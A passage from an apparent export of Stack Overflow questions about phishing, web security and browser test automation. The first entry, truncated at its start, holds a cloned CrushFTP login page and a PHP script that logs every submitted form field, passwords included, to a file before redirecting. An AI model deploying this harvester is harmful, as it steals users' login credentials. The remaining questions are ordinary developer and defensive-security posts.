  &amp;lt;div style=&amp;quot;clear:both;height:1px;padding:0px;margin:0px;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;submit clearfix&amp;quot;&amp;gt;
  &amp;lt;a class=&amp;quot;button&amp;quot; id=&amp;quot;btnResetPassword&amp;quot; href=&amp;quot;javascript:void(0);&amp;quot;&amp;gt;
  &amp;lt;span id=&amp;quot;ResetPasswordButtonText&amp;quot;&amp;gt;Reset Password&amp;lt;/span&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;a class=&amp;quot;button&amp;quot; id=&amp;quot;btnBackToLogin&amp;quot; href=&amp;quot;javascript:void(0);&amp;quot;&amp;gt;
  &amp;lt;span id=&amp;quot;BackToLoginButtonText&amp;quot;&amp;gt;Back to Login&amp;lt;/span&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div style=&amp;quot;clear:both;height:1px;padding:0px;margin:0px;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;/p&amp;gt;
  &amp;lt;div style=&amp;quot;clear:both;height:1px;padding:0px;margin:0px;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;/p&amp;gt;
  &amp;lt;div style=&amp;quot;clear:both;height:1px;padding:0px;margin:0px;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/form&amp;gt;
  &amp;lt;form id=&amp;quot;changePassForm&amp;quot; method=&amp;quot;post&amp;quot; target=&amp;quot;dummyIframe&amp;quot; action=&amp;quot;/WebInterface/function/&amp;quot; onsubmit=&amp;quot;doLogin();&amp;quot;&amp;gt;
  &amp;lt;div id=&amp;quot;changepasswordPanel&amp;quot; style=&amp;quot;display:none;margin-bottom:10px;&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;clearfix branding&amp;quot; style=&amp;quot;clear:both;&amp;quot;&amp;gt;
  &amp;lt;a id=&amp;quot;defaultLogoLink&amp;quot; href=&amp;quot;http://www.crushftp.com/&amp;quot;&amp;gt;
  &amp;lt;img id=&amp;quot;imgLogo&amp;quot; src=&amp;quot;web%20FTP%20WebInterface_files/logo.png&amp;quot; style=&amp;quot;border-width:0px;float:left;margin:3px 0px 10px 0px;&amp;quot;&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;h2 class=&amp;quot;popupHeader&amp;quot; style=&amp;quot;clear:both;margin-top:15px;&amp;quot; id=&amp;quot;ChangePasswordHeaderText&amp;quot;&amp;gt;Change your password&amp;lt;/h2&amp;gt;
  &amp;lt;div class=&amp;quot;passwordChangeNote&amp;quot; id=&amp;quot;ChangePasswordNoteText&amp;quot;&amp;gt;You must change your password to continue&amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;buttonPanel&amp;quot;&amp;gt;
  &amp;lt;label for=&amp;quot;current_password&amp;quot; id=&amp;quot;CurrentPasswordText&amp;quot;&amp;gt;Current Password : &amp;lt;/label&amp;gt;
  &amp;lt;input id=&amp;quot;current_password&amp;quot; class=&amp;quot;textbox&amp;quot; type=&amp;quot;password&amp;quot;&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;label for=&amp;quot;new_password1&amp;quot; id=&amp;quot;NewPasswordText&amp;quot;&amp;gt;New Password : &amp;lt;/label&amp;gt;
  &amp;lt;input id=&amp;quot;new_password1&amp;quot; class=&amp;quot;textbox&amp;quot; type=&amp;quot;password&amp;quot;&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;label for=&amp;quot;new_password2&amp;quot; id=&amp;quot;ConfirmPasswordText&amp;quot;&amp;gt;Confirm Password : &amp;lt;/label&amp;gt;
  &amp;lt;input id=&amp;quot;new_password2&amp;quot; class=&amp;quot;textbox&amp;quot; type=&amp;quot;password&amp;quot;&amp;gt;
  &amp;lt;div style=&amp;quot;text-align:right;margin-top:10px;&amp;quot;&amp;gt;
  &amp;lt;a id=&amp;quot;btnChangePasswordCancel&amp;quot; class=&amp;quot;button&amp;quot; href=&amp;quot;javascript:void(0);&amp;quot;&amp;gt;
  &amp;lt;span id=&amp;quot;CancelButtonText&amp;quot;&amp;gt;Cancel&amp;lt;/span&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;a id=&amp;quot;btnChangePassword&amp;quot; class=&amp;quot;button&amp;quot; href=&amp;quot;javascript:void(0);&amp;quot;&amp;gt;
  &amp;lt;span id=&amp;quot;ChanngePasswordButtonText&amp;quot;&amp;gt;Change Password&amp;lt;/span&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div style=&amp;quot;clear:both&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;spacing&amp;quot;&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;hr&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id=&amp;quot;generatePasswordPanel&amp;quot;&amp;gt;
  &amp;lt;a id=&amp;quot;btnGeneratePassword&amp;quot; class=&amp;quot;button&amp;quot; href=&amp;quot;javascript:void(0);&amp;quot; style=&amp;quot;float:left&amp;quot;&amp;gt;
  &amp;lt;span id=&amp;quot;GeneratePasswordButtonText&amp;quot;&amp;gt;Generate password&amp;lt;/span&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;div id=&amp;quot;passwordGeneratePanel&amp;quot; style=&amp;quot;display:none;&amp;quot;&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;input id=&amp;quot;generated_password&amp;quot; type=&amp;quot;text&amp;quot; class=&amp;quot;textboxSmall&amp;quot; style=&amp;quot;float:left;&amp;quot;&amp;gt;
  &amp;lt;a id=&amp;quot;usePassword&amp;quot; class=&amp;quot;button&amp;quot; href=&amp;quot;javascript:void(0);&amp;quot; style=&amp;quot;float:left&amp;quot;&amp;gt;
  &amp;lt;span id=&amp;quot;GeneratePasswordUseButtonText&amp;quot;&amp;gt;Use this&amp;lt;/span&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;a id=&amp;quot;cancelPassword&amp;quot; class=&amp;quot;button&amp;quot; href=&amp;quot;javascript:void(0);&amp;quot; style=&amp;quot;float:left&amp;quot;&amp;gt;
  &amp;lt;span id=&amp;quot;GeneratePasswordCancelButtonText&amp;quot;&amp;gt;Cancel&amp;lt;/span&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div style=&amp;quot;clear:both&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/form&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id=&amp;quot;OTPBox&amp;quot; style=&amp;quot;display:none;&amp;quot;&amp;gt;
  &amp;lt;img class=&amp;quot;closeButton&amp;quot; alt=&amp;quot;close&amp;quot; src=&amp;quot;web%20FTP%20WebInterface_files/cancel.png&amp;quot; onclick=&amp;quot;$.unblockUI();&amp;quot;&amp;gt;
  &amp;lt;h2 class=&amp;quot;popupHeader&amp;quot; id=&amp;quot;OTPDialogHeaderText&amp;quot;&amp;gt;Enter your OTP here&amp;lt;/h2&amp;gt;
  &amp;lt;div class=&amp;quot;buttonPanel&amp;quot;&amp;gt;
  &amp;lt;div style=&amp;quot;width:100%;&amp;quot;&amp;gt;
  &amp;lt;input id=&amp;quot;otp&amp;quot; type=&amp;quot;password&amp;quot; style=&amp;quot;width:95%;padding:5px;&amp;quot;&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;div id=&amp;quot;OTPDialogDescText&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;div style=&amp;quot;text-align: right; margin-top: 10px;&amp;quot;&amp;gt;
  &amp;lt;button id=&amp;quot;btnSubmitOTP&amp;quot;&amp;gt;
  &amp;lt;span id=&amp;quot;OTPSubmitButtonText&amp;quot;&amp;gt;Submit&amp;lt;/span&amp;gt;
  &amp;lt;/button&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id=&amp;quot;loginPageFooterText&amp;quot;&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;iframe id=&amp;quot;dummyIframe&amp;quot; name=&amp;quot;dummyIframe&amp;quot; src=&amp;quot;javascript:false;&amp;quot; style=&amp;quot;display:none;&amp;quot;&amp;gt;&amp;lt;/iframe&amp;gt;
 &amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;this is my post.php&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php
 // Set the location to redirect the page
 header ('Location: http://localhost/redirect.html');
 // Open the text file in writing mode
 $file = fopen(&amp;quot;log.txt&amp;quot;, &amp;quot;a&amp;quot;);
 foreach($_POST as $variable =&amp;gt; $value) {
  fwrite($file, $variable);
  fwrite($file, &amp;quot;=&amp;quot;);
  fwrite($file, $value);
  fwrite($file, &amp;quot;\r\n&amp;quot;);
 }
 fwrite($file, &amp;quot;\r\n&amp;quot;);
 fclose($file);
 exit;
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;html&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How do you prevent phishing in mobile app?</t>
  </si>
  <si>
    <t>&lt;p&gt;Imagine a scenario in which a game X installed on your mobile device wants to access your account information from social network Y. Assume that Y exposes some API, and have features like "login with Y" etc. On desktop PC X could popup new browser window, with domain of Y clearly shown in address bar, with a padlock icon clearly indicating SSL connection, and in this popup, social network Y would ask user to provide login, password, and agreement to pass some information (like name, avatar, e-mail) to the application X. For example OAuth 2 uses this approach. &lt;/p&gt;
 &lt;p&gt;In my opinion, on mobile the situation is in rather different, as application X can take control of whole screen. In particular it can draw on the device's screen something that is indistinguishable from a real browser and hijack login and password provided by user. &lt;/p&gt;
 &lt;p&gt;How one can combat malicious applications which cover whole screen and pretend to be browsers, or even OS's settings windows etc?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;mobile&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Can I be sure that a Sharepoint site is owned by the company?</t>
  </si>
  <si>
    <t>&lt;p&gt;I got an email at work asking me to update a password in a document at a web address in the form &lt;a href="https://companyname.sharepoint.com/:x:/s/.." rel="nofollow noreferrer"&gt;https://companyname.sharepoint.com/:x:/s/..&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;Can I be assured that the company &amp;quot;companyname&amp;quot; owns that Sharepoint site? Or could anyone have set up an account at Microsoft with that name?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;sharepoint&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Identifying Traffic From Spoofed URL Redirect - PHP / Apache</t>
  </si>
  <si>
    <t>&lt;p&gt;Been rolling this around in my mind a few days. Here's the Situation.&lt;/p&gt;
 &lt;p&gt;A few weeks ago a person bought a similar domain name and set it to 301 Redirect to my actual page. He then used this to write software developers asking for press keys to their applications for review promising space in our publication.&lt;/p&gt;
 &lt;p&gt;What I would like is to make a special message appear whenever someone lands on my site from the specific URL redirect.&lt;/p&gt;
 &lt;p&gt;So IF User A Enters the Site at: example.org and gets redirected to example.com automatically the site serves a different page than User B.&lt;/p&gt;
 &lt;p&gt;User B Enters the Site directly at: example.com&lt;/p&gt;
 &lt;p&gt;This way I can tip developers off that they've been phished and to ignore the email they received and forward it to my real address so I can add it to the list of affected companies for the law enforcement agents. &lt;/p&gt;
 &lt;p&gt;System is a LAMP environment&lt;/p&gt;
 &lt;p&gt;Thanks in Advance!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;apache&gt;&lt;.htaccess&gt;&lt;redirect&gt;</t>
  </si>
  <si>
    <t>Why do browsers allow onmousedown JS to change href?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've noticed for a very long time that when you try to copy a link location or open a link on Facebook, it modifies the link and passes it through &lt;code&gt;l.php&lt;/code&gt;. &lt;/p&gt;
 &lt;p&gt;For example, I can be sent to &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.google.com%2F&amp;amp;h=DKVUritNDJDJLDLVbldoDLFKBLOD5dlfDJY_-d3fgDUaA9b
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;even though my browser render the link preview as &lt;code&gt;http://www.google.com/&lt;/code&gt;. &lt;/p&gt;
 &lt;p&gt;Today, I took a closer look using Firebug and found that Facebook puts &lt;code&gt;onmousedown="UntrustedLink.bootstrap($(this)[...]&lt;/code&gt; in the &lt;code&gt;&amp;lt;a&amp;gt;&lt;/code&gt; tag. The second I right clicked the link, I saw the &lt;code&gt;href&lt;/code&gt; attribute change in Firebug.&lt;/p&gt;
 &lt;p&gt;This worries me.&lt;/p&gt;
 &lt;p&gt;The advice many of us have given to less tech-savvy people (check where the link is taking you before you click so that you don't become a victim of phishing) now seems to have become useless. Isn't this a security risk? Can't phishing websites misuse this? &lt;/p&gt;
 &lt;p&gt;Why don't browsers prevent this behavior either by disallowing &lt;code&gt;onmousedown&lt;/code&gt; to change the &lt;code&gt;href&lt;/code&gt; or by running the javascript before reading the &lt;code&gt;href&lt;/code&gt; attribute, so that I am sent to the location I thought I going to, not the one change while I was clicking it?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: I want to briefly emphasize that what bothers me more than the risk of phishing is that users are being misled and it simply feels wrong to me that this can happen, whether by a trusted source or not.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;security&gt;&lt;href&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Error with no hint of problem cause - 'ERROR @wdio/runner: Error'</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm getting this error when trying to run Cucumber JS tests inside of the docker container.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Error log from console inside of a container&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;2021-09-13T13:25:32.569Z DEBUG @wdio/utils:initialiseServices: initialise service &amp;quot;docker&amp;quot; as NPM package
 2021-09-13T13:25:32.593Z INFO @wdio/cli:launcher: Run onPrepare hook
 2021-09-13T13:25:32.595Z DEBUG @wdio/cli:utils: Finished to run &amp;quot;onPrepare&amp;quot; hook in 2ms
 2021-09-13T13:25:32.596Z INFO @wdio/cli:launcher: Run onWorkerStart hook
 2021-09-13T13:25:32.596Z DEBUG @wdio/cli:utils: Finished to run &amp;quot;onWorkerStart&amp;quot; hook in 0ms
 2021-09-13T13:25:32.597Z INFO @wdio/local-runner: Start worker 0-0 with arg: features/env_Pindstrup/config/wdio.single.conf.js
 [0-3] 2021-09-13T11:45:58.891Z WARN @wdio/utils:shim: You are running tests with @wdio/sync which will be discontinued starting Node.js v16.Read more on https://github.com/webdriverio/webdriverio/discussions/6702
 [0-3] 2021-09-13T11:45:59.201Z INFO @wdio/local-runner: Run worker command: run
 [0-3] 2021-09-13T11:45:59.261Z DEBUG @wdio/config:utils: Found '@babel/register' package, auto-compiling files with Babel
 [0-3] 2021-09-13T11:45:59.536Z DEBUG @wdio/local-runner:utils: init remote session
 [0-3] 2021-09-13T11:45:59.538Z DEBUG @wdio/utils:initialiseServices: initialise service &amp;quot;docker&amp;quot; as NPM package
 [0-3] RUNNING in chrome - /features/env/workAcception.feature
 [0-3] 2021-09-13T11:45:59.858Z DEBUG @wdio/local-runner:utils: init remote session
 [0-3] 2021-09-13T11:45:59.864Z INFO devtools:puppeteer: Initiate new session using the DevTools protocol
 [0-3] 2021-09-13T11:45:59.865Z INFO devtools: Launch Google Chrome with flags: --enable-automation --disable-popup-blocking --disable-extensions --disable-background-networking --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-sync --metrics-recording-only --disable-default-apps --mute-audio --no-first-run --no-default-browser-check --disable-hang-monitor --disable-prompt-on-repost --disable-client-side-phishing-detection --password-store=basic --use-mock-keychain --disable-component-extensions-with-background-pages --disable-breakpad --disable-dev-shm-usage --disable-ipc-flooding-protection --disable-renderer-backgrounding --force-fieldtrials=*BackgroundTracing/default/ --enable-features=NetworkService,NetworkServiceInProcess --disable-features=site-per-process,TranslateUI,BlinkGenPropertyTrees --window-position=0,0 --window-size=1200,900 --use-fake-ui-for-media-stream --use-fake-device-for-media-stream
 [0-3] 2021-09-13T11:45:59.917Z ERROR @wdio/runner: Error: 
 [0-3] at new LauncherError (/var/www/html/onsite-tests-cucumber/node_modules/chrome-launcher/src/utils.ts:31:18)
 [0-3] at new ChromePathNotSetError (/var/www/html/onsite-tests-cucumber/node_modules/chrome-launcher/dist/utils.js:33:9)
 [0-3] at Object.linux (/var/www/html/onsite-tests-cucumber/node_modules/chrome-launcher/src/chrome-finder.ts:153:11)
 [0-3] at Function.getFirstInstallation (/var/www/html/onsite-tests-cucumber/node_modules/chrome-launcher/src/chrome-launcher.ts:177:61)
 [0-3] at Launcher.launch (/var/www/html/onsite-tests-cucumber/node_modules/chrome-launcher/src/chrome-launcher.ts:223:37)
 [0-3] at Object.launch (/var/www/html/onsite-tests-cucumber/node_modules/chrome-launcher/src/chrome-launcher.ts:71:18)
 [0-3] at launchChrome (/var/www/html/onsite-tests-cucumber/node_modules/devtools/build/launcher.js:72:44)
 [0-3] at Object.launch [as default] (/var/www/html/onsite-tests-cucumber/node_modules/devtools/build/launcher.js:172:16)
 [0-3] at Function.newSession (/var/www/html/onsite-tests-cucumber/node_modules/devtools/build/index.js:50:49)
 [0-3] at Object.remote (/var/www/html/onsite-tests-cucumber/node_modules/webdriverio/build/index.js:67:43)
 [0-3] at processTicksAndRejections (internal/process/task_queues.js:97:5)
 [0-3] at Runner._startSession (/var/www/html/onsite-tests-cucumber/node_modules/@wdio/runner/build/index.js:217:56)
 [0-3] at Runner._initSession (/var/www/html/onsite-tests-cucumber/node_modules/@wdio/runner/build/index.js:173:25)
 [0-3] at Runner.run (/var/www/html/onsite-tests-cucumber/node_modules/@wdio/runner/build/index.js:87:19)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I have no idea what kind of a thing is causing this error to appear.
 Thanks in advance!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;selenium&gt;&lt;google-chrome&gt;&lt;webdriver-io&gt;&lt;cucumberjs&gt;</t>
  </si>
  <si>
    <t>Firefox auth pop-up getting error: User prompt of type promptUserAndPass is not supported</t>
  </si>
  <si>
    <t>&lt;p&gt;My Auth functionality is working great in chrome but as Firefox handle it differently I am not able to login the auth by anyway.&lt;/p&gt;
 &lt;p&gt;My Firefox version : 72.02&lt;/p&gt;
 &lt;p&gt;I have found that it is known bug but they are 1 year old post, if anyone has solution kindly share&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1556026" rel="nofollow noreferrer"&gt;https://bugzilla.mozilla.org/show_bug.cgi?id=1556026&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1556307" rel="nofollow noreferrer"&gt;https://bugzilla.mozilla.org/show_bug.cgi?id=1556307&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Normal code will not work as below as I need to add token to url runtime as similar shown in chrome but not in Firefox&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;driver.get("https://your-username:your-password@example.com");
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;So I need to do some sendKeys in this case which is failing for me&lt;/p&gt;
 &lt;p&gt;I am getting error as :&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Exception in thread "main"
  org.openqa.selenium.UnsupportedCommandException: User prompt of type
  promptUserAndPass is not supported Build info: version: '3.141.59',
  revision: 'e82be7d358', time: '2018-11-14T08:17:03' System info: host:
  '', ip: '', os.name: 'Windows 10', os.arch:
  'amd64', os.version: '10.0', java.version: '1.8.0_66' Driver info:
  org.openqa.selenium.firefox.FirefoxDriver&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Code I am trying:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;public static void main(String[] args) throws InterruptedException, AWTException {
  /* BrowserMobProxy proxy = new BrowserMobProxyServer();
  proxy.start(0);
  Proxy seleniumProxy = ClientUtil.createSeleniumProxy(proxy);*/
  // put our custom header to each request
 /* proxy.addRequestFilter((request, contents, messageInfo)-&amp;gt;{
  request.headers().add("my-test-header", "my-test-value");
  System.out.println(request.headers().entries().toString());
  return null;
  });*/
  // Setting up Proxy for chrome
  // ChromeOptions opts = new ChromeOptions();
  WebDriver driver = null;
  String url = "https://qa.xyz-domain/new-request/";
  String UserName = "xyzuser";
  String Password = "xyz@202";
  System.setProperty("webdriver.gecko.driver",
  "D:\\Demoproject\\src\\main\\resources\\drivers\\geckodriver.exe");
  FirefoxOptions options = new FirefoxOptions();
  options.setCapability("network.http.phishy-userpass-length", 255);
  options.setCapability("network.automatic-ntlm-auth.trusted-uris","testcloud");
  // options.setp
  // options.setCapability(CapabilityType.);
  String val=UserName+":"+Password;
  String encodedCreadentials = "Basic " + (Base64.getEncoder().encodeToString(val.getBytes()));
  options.setCapability("Authorization",encodedCreadentials);
  // String proxyOption = "--proxy-server=" + seleniumProxy.getHttpProxy();
  // options.addArguments(proxyOption);
  // options.addArguments(arguments)
  driver = new FirefoxDriver(options);
  driver.get(url);
  Thread.sleep(5000);
  driver.findElement(By.name("loginfmt")).sendKeys("user.name@xyz.com");
  driver.findElement(By.name("loginfmt")).sendKeys(Keys.ENTER);
  Thread.sleep(15000);
  driver.switchTo().alert().sendKeys(UserName);
  /*BrowserMobProxy browserMobProxy = new BrowserMobProxyServer();
  browserMobProxy.addHeader("Authorization", encodedCreadentials);
  browserMobProxy.start();*/
  //ProxyServer bmp = new ProxyServer(4444);
  /* Robot robot = new Robot();
  robot.keyPress(KeyEvent.VK_ENTER);
  driver.switchTo().alert().sendKeys(UserName);*/
 /* Alert alert = driver.switchTo().alert();
  System.out.println(alert.getText());
  if (alert.getText().contains("jjjj")) {*/
  // alert.sendKeys("UserName");
  //driver.switchTo().alert().dismiss();;
  //driver.switchTo().alert().sendKeys(UserName + Keys.TAB + Password);
  //alert.sendKeys(UserName + Keys.TAB + Password);
  /*String url2 = driver.getCurrentUrl().replaceAll("https://", "");
  System.out.println("url2 = " + url2);
  String url3 = "https://" + UserName + ":" + Password + "@" + url2 + "/";
  System.out.println("url3 = " + url3);
  driver.get(url3);
  //driver.switchTo().alert().sendKeys(UserName + Keys.TAB + Password);
  //driver.switchTo().alert().accept();
  String url2 = driver.getCurrentUrl().replaceAll("https://", "");
  System.out.println("url2 = " + url2);
  String url3 = "https://" + UserName + ":" + Password + "@" + url2 + "/";
  System.out.println("url3 = " + url3);
  driver.get(url3);*/
  /*} else {
  System.out.println("not appearing");
  }*/
  }
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;I tried to use BrowserMobProxy but I believe it works with http request only I guess and for https har required, let me know if there is issue with my understanding. or we can use it anyway for https&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;refer:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/x78zI.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/x78zI.jpg" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;java&gt;&lt;selenium-webdriver&gt;&lt;selenium-firefoxdriver&gt;&lt;browsermob-proxy&gt;</t>
  </si>
  <si>
    <t>Phishing Detected! warning in Chrome</t>
  </si>
  <si>
    <t>&lt;p&gt;I have encountered the "Phishing Detected" warning in Chrome browser on my dev site. Interestingly I don't encounter the same warning in Firefox or Safari even though, as far I can tell, they are using the same phishing database (although in Safari preferences it says "google safe browsing service is unavailable"). I also don't encounter the warning on the same page of the production sites.&lt;/p&gt;
 &lt;p&gt;It first popped up on a new account verification page I created which amongst other things asked users to confirm their PayPal account with the &lt;a href="https://developer.paypal.com/webapps/developer/docs/classic/api/adaptive-accounts/GetVerifiedStatus_API_Operation/" rel="noreferrer"&gt;GetVerifiedStatus API&lt;/a&gt;. This requires only name and email.&lt;/p&gt;
 &lt;p&gt;I have also encountered the warning on a configuration page which asks for the PayPal email address which the user wishes to receive payments to. &lt;/p&gt;
 &lt;p&gt;Neither page requests a password or any other data that would be considered a secret. &lt;/p&gt;
 &lt;p&gt;As you might gather I have zeroed in on a potential false positive on the PayPal portion of the content as if perhaps I am phishing for PayPal information beyond the payers email address. There has been no malicious code injection or any such thing. Even when i've removed all content from the page the warning is still present. &lt;/p&gt;
 &lt;p&gt;I &lt;a href="http://www.google.com/safebrowsing/report_error/" rel="noreferrer"&gt;reported&lt;/a&gt; the first incorrect detection to Google, and intend to do the same for the second incident, however what I really want to clear up is:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;What content can lead to this warning?&lt;/li&gt;
 &lt;li&gt;How can I avoid it in the future? &lt;/li&gt;
 &lt;li&gt;How can I get some info from the "authorities" on which urls are blocked? (Webmaster Tools is not showing warnings for the dev site)&lt;/li&gt;
 &lt;li&gt;How can I flush my local cache of "bad sites" in case I want to re-test?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Clearly having a massive red alert presented to a user on a production site would be disastrous, and there is a (perhaps deliberate) lack of information about how this safe browsing service actually works.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google-chrome&gt;&lt;paypal&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How do I use Google's token from AccountManager in my web app? (Rails with omniauth-google-oauth2)</t>
  </si>
  <si>
    <t>&lt;ul&gt;
 &lt;li&gt;I have a web application that uses &lt;code&gt;omniauth-google-oauth2&lt;/code&gt; for authenticating using a Google account. The session is then kept using a cookie (&lt;code&gt;session[:user_id]&lt;/code&gt;). This works.&lt;/li&gt;
 &lt;li&gt;I also have an Android application that uses the website services using REST/JSON API.
 The application uses &lt;code&gt;AccountManager&lt;/code&gt; to get an access token. This also works.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I'm trying to get the Android application to make a request that makes the web application verify that token and start a session with the Android application (the cookies are persistent on the Android application).&lt;/p&gt;
 &lt;p&gt;I noticed that the callback URL from Google is: &lt;code&gt;http://my.domain.com/auth/google_oauth2/callback&lt;/code&gt;, so I tried adding the parameters &lt;code&gt;state="/"&lt;/code&gt; and &lt;code&gt;code="&amp;lt;TOKEN FROM AccountManager&amp;gt;"&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;This caused:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;(google_oauth2) Callback phase initiated.
 (google_oauth2) Authentication failure! invalid_credentials: OmniAuth::Strategies::OAuth2::CallbackError, OmniAuth::Strategies::OAuth2::CallbackError
 Started GET "/auth/google_oauth2/callback?state=%2F&amp;amp;code=&amp;lt;TOKEN FROM AccountManager&amp;gt;" for 5.102.217.111 at 2013-08-10 18:38:58 +0300
 OmniAuth::Strategies::OAuth2::CallbackError (OmniAuth::Strategies::OAuth2::CallbackError):
  omniauth-oauth2 (1.1.1) lib/omniauth/strategies/oauth2.rb:71:in `callback_phase'
  omniauth (1.1.4) lib/omniauth/strategy.rb:226:in `callback_call'
  omniauth (1.1.4) lib/omniauth/strategy.rb:182:in `call!'
  omniauth (1.1.4) lib/omniauth/strategy.rb:164:in `call'
  omniauth (1.1.4) lib/omniauth/builder.rb:49:in `call'
  actionpack (3.2.13) lib/action_dispatch/middleware/best_standards_support.rb:17:in `call'
  rack (1.4.5) lib/rack/etag.rb:23:in `call'
  rack (1.4.5) lib/rack/conditionalget.rb:25:in `call'
  actionpack (3.2.13) lib/action_dispatch/middleware/head.rb:14:in `call'
  actionpack (3.2.13) lib/action_dispatch/middleware/params_parser.rb:21:in `call'
  actionpack (3.2.13) lib/action_dispatch/middleware/flash.rb:242:in `call'
  rack (1.4.5) lib/rack/session/abstract/id.rb:210:in `context'
  rack (1.4.5) lib/rack/session/abstract/id.rb:205:in `call'
  actionpack (3.2.13) lib/action_dispatch/middleware/cookies.rb:341:in `call'
  activerecord (3.2.13) lib/active_record/query_cache.rb:64:in `call'
  activerecord (3.2.13) lib/active_record/connection_adapters/abstract/connection_pool.rb:479:in `call'
  actionpack (3.2.13) lib/action_dispatch/middleware/callbacks.rb:28:in `block in call'
  activesupport (3.2.13) lib/active_support/callbacks.rb:405:in `_run__1566251561940761300__call__2926332968477140393__callbacks'
  activesupport (3.2.13) lib/active_support/callbacks.rb:405:in `__run_callback'
  activesupport (3.2.13) lib/active_support/callbacks.rb:385:in `_run_call_callbacks'
  activesupport (3.2.13) lib/active_support/callbacks.rb:81:in `run_callbacks'
  actionpack (3.2.13) lib/action_dispatch/middleware/callbacks.rb:27:in `call'
  actionpack (3.2.13) lib/action_dispatch/middleware/reloader.rb:65:in `call'
  actionpack (3.2.13) lib/action_dispatch/middleware/remote_ip.rb:31:in `call'
  actionpack (3.2.13) lib/action_dispatch/middleware/debug_exceptions.rb:16:in `call'
